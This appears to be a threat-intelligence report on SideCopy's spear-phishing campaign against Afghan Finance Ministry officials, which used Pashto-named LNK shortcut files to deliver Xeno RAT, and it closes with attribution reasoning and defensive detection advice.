Pakistan-attributed threat group SideCopy has launched a targeted spear-phishing campaign against officials at Afghanistan’s Ministry of Finance, delivering malicious LNK shortcut files crafted with Pashto-language filenames to blend with legitimate Afghan government documents and deploy Xeno RAT on victim systems.
SideCopy’s Campaign Against Afghanistan’s Finance Ministry
SideCopy operates under the Transparent Tribe umbrella — a broader Pakistan-attributed threat cluster with a long record of targeting government and defense organizations across South and Central Asia. In this campaign, the group selected the Afghanistan Ministry of Finance as the primary target, consistent with Pakistani state intelligence interests in Afghan government financial operations, including tracking cross-border financial flows and economic policy.
The delivery mechanism is spear-phishing email carrying malicious LNK shortcut files. LNK-based delivery is a well-established technique for bypassing file-type restrictions that block macro-enabled documents, and the files in this campaign were given Pashto-language filenames designed to appear as routine Afghan government documents. That language-specific detail signals pre-attack reconnaissance: the threat actor studied the target environment’s document conventions closely enough to replicate them convincingly.
Xeno RAT: Full System Access Through a Single Lure
The payload delivered through the LNK files is Xeno RAT, a full-featured remote access trojan capable of providing complete control over compromised systems. Xeno RAT’s capabilities include file access and exfiltration, keylogging, screenshot capture, process injection, live audio streaming, live video streaming, and credential harvesting.
That capability set gives SideCopy operators persistent, deep access to the compromised official’s workstation — and through it, to whatever internal Ministry of Finance systems and communications that workstation can reach. A Finance Ministry official’s machine is likely to hold budget documents, inter-agency communications, banking system credentials, and correspondence with international financial institutions — precisely the categories of intelligence that would serve Pakistani state intelligence objectives in the current regional environment.
Lure Crafting as an Intelligence Indicator
The use of Pashto-language filenames is not just an operational tradecraft choice — it is a significant intelligence indicator. Creating convincing Pashto-language document lures requires either native-language operators or prior collection sufficient to generate authentic-looking filenames. This level of target-environment knowledge is consistent with SideCopy’s documented approach to pre-attack reconnaissance and distinguishes this campaign from lower-sophistication phishing operations that rely on generic English-language lures.
The decision to use LNK files rather than more common delivery formats also reflects awareness of the target organization’s likely defensive posture. LNK delivery avoids triggers associated with Office macro execution, suggesting the threat actor anticipated that macro-based lures would face blocking controls in the target environment.
SideCopy’s 2026 Operational Pattern
SideCopy’s targeting of Afghanistan’s Finance Ministry extends the group’s operational cadence for 2026, which has also included attacks against Indian defense and technology organizations. The combination of targets — Indian defense and technology on one axis, Afghan government finance on another — illustrates the group’s geographic reach across South and Central Asian government institutions and its alignment with the intelligence collection priorities that Pakistani state actors have historically pursued in the region.
High-confidence attribution is based on TTP overlap with known SideCopy infrastructure. The group’s characteristic use of LNK-based delivery, language-tailored lures, and RAT-based post-exploitation aligns closely with the technical profile established across earlier SideCopy campaigns.
Detecting SideCopy Post-Execution in Afghan Government Environments
Government networks in South and Central Asia operating in threat environments where SideCopy is active face a specific challenge: the group’s lures are designed to be indistinguishable from legitimate documents within the target organization’s own workflow. Standard user awareness training centered on spotting “suspicious” attachments is less effective when the attachment appears exactly as expected. Detection focus should fall on post-execution behavior — network beaconing, process injection activity, and anomalous outbound connections — rather than relying on file-type or filename inspection at the perimeter.
